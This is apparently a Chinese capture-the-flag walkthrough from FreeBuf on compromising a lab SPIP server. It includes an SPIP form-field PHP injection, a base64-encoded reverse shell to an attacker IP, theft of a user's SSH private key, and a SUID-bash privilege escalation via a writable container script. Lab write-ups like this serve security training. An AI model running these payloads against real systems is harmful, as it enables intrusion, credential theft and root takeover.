官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
端口扫描
使用
gobuster dir -u http://10.201.99.17/ -w directory-list-2.3-medium.txt
扫描得到目录:
访问发现这是一个使用spip搭建的web服务
搜索spip漏洞,发现存在
oubli=s:19:"<?php phpinfo(); ?>";
执行下述payload
s:93:"<?Php system('echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuNC44LjY4LzQ0NDQgMD4mMQ== |base64 -d|bash'); ?>"
成功反连上设备
登陆了www-data账号
发现可以查看日志
发现
提示没有密钥了,意思可以生成密钥
发现存在两个用户 root以及think
发先可以进入/home/think
发现了第一个user.txt
然后我们发现可以查看用户的.ssh文件夹以及id_rsa
复制id_rsa到本地后,使用密钥访问到了think用户
登录访问上去
我们找到了一个特殊的文件
使用strings该文件
strings /usr/sbin/run_container
我们
发现/usr/sbin/run_container使用了/bin/bash执行/opt/run_container.sh
我们发现我们修改该文件
echo $SHELL
/usr/sbin/ash
我们发现我们在/ash执行相关命令
发现我们的shell从/usr/sbin/ash开始建立,无法写入该/opt/run_container.sh
发现我们无法修改该文件
我们可以临时修改我们的shell环境
echo -e '#!/usr/bin/perl\nexec "/bin/sh"' > /dev/shm/test.pl
chmod +x /dev/shm/test.pl
/dev/shm/test.pl
修改了我们的shell环境后,我们可以尝试再次修改/opt/run_container.sh
$ echo '#!/bin/bash\nchmod +s /bin/bash' > /opt/run_container.sh
然后执行
/usr/sbin/run_container
/dev/shm/my_sh免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
已在FreeBuf发表 0 篇文章
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf
客服小蜜蜂(微信:freebee1024)